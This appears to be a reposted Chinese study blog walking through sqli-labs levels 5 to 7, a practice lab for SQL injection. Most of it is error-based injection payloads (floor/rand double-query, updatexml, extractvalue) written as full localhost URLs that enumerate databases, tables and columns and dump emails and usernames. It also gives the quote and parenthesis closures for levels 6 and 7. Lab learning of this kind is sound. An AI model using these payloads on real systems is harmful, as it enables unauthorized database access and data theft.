当前位置：Gxlcms > 数据库问题 > sqli-labs学习(less-5-less-7)

sqli-labs学习(less-5-less-7)

时间：2021-07-01 10:21:17 帮助过：21人阅读

). 通过floor报错 and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a) 其中payload为你要插入的SQL语句需要注意的是该语句将输出字符长度限制为64个字符 (2). 通过updatexml报错 and updatexml(1,payload,1) 同样该语句对输出的字符长度也做了限制，其最长输出32位并且该语句对payload的反悔类型也做了限制，只有在payload返回的不是xml格式才会生效 (3). 通过ExtractValue报错 and extractvalue(1, payload) 输出字符有长度限制，最长32位。 payload即我们要输入的sql查询语句

技术分享图片

floor报错注入即双查询注入

可以参考

https://www.2cto.com/article/201303/192718.html

双注入的原理总的来说就是，当一个聚合函数后面出现group分组语句时，会将查询的一部分结果以报错的形式返回，他有一个固定的公式。

http://localhost/sql/Less-5/?id=1‘ union select count(*),count(*), concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a%23
当然只有一个也行
http://localhost/sqli/Less-5/?id=1‘ union select count(*),1, concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a%23

http://localhost/sqli-labs-master/Less-5/?id=-1‘ union select count(*),2,concat(‘*‘,(select database()),‘*‘,floor(rand()*2))as a from information_schema.tables group by a--+

http://localhost/sql/Less-5/?id=-1‘ and (select 1 from (select count(*),concat(((select schema_name from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

因为是随机性,所以要多刷新几下

http://localhost/sql/Less-5/?id=-1‘ union select count(*),count(*),concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a %23

技术分享图片

查询有哪些数据库

http://localhost/sql/Less-5/?id=2‘ and (select 1 from (select count(*),concat(((select group_concat(schema_name) from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

字数超限

http://localhost/sql/Less-5/?id=2‘ and (select 1 from (select count(*),concat(((select schema_name from information_schema.schemata limit 1,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

技术分享图片

查询表

http://localhost/sql/Less-5/?id=1‘ union select count(*),1, concat(‘~‘,(select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),‘~‘, floor(rand()*2)) as a from information_schema.tables group by a%23

查询列字段

http://localhost/sql/Less-5/?id=1‘ union select count(*),1, concat(‘~‘,(select column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘emails‘ limit 0,1),‘~‘, floor(rand()*2)) as a from information_schema.tables group by a%23

查询内容

http://localhost/sql/Less-5/?id=1‘ union select count(*),1, concat(‘~‘,(select email_id from emails limit 0,1),‘~‘, floor(rand()*2)) as a from information_schema.tables group by a%23

http://localhost/sql/Less-5/?id=1‘ union select count(*),1, concat(‘~‘,(select username from users limit 0,1),‘~‘, floor(rand()*2)) as a from information_schema.tables group by a%23

用group_concat()查看多个发现不行,不知道为啥~~

less-6

与less-5一样,只是把id外面的单引号改为了双引号

less-7

关键代码

$sql="SELECT * FROM users WHERE id=((‘$id‘)) LIMIT 0,1";

关键只是id用‘))闭合就行了,但缺爆了错误，有点蒙，以后补充解释,

提示是用

use outfile

sqli-labs学习(less-5-less-7)

标签：补充 for 查看 ima src article XML 部分 sqli

sqli-labs学习(less-5-less-7)

人气教程排行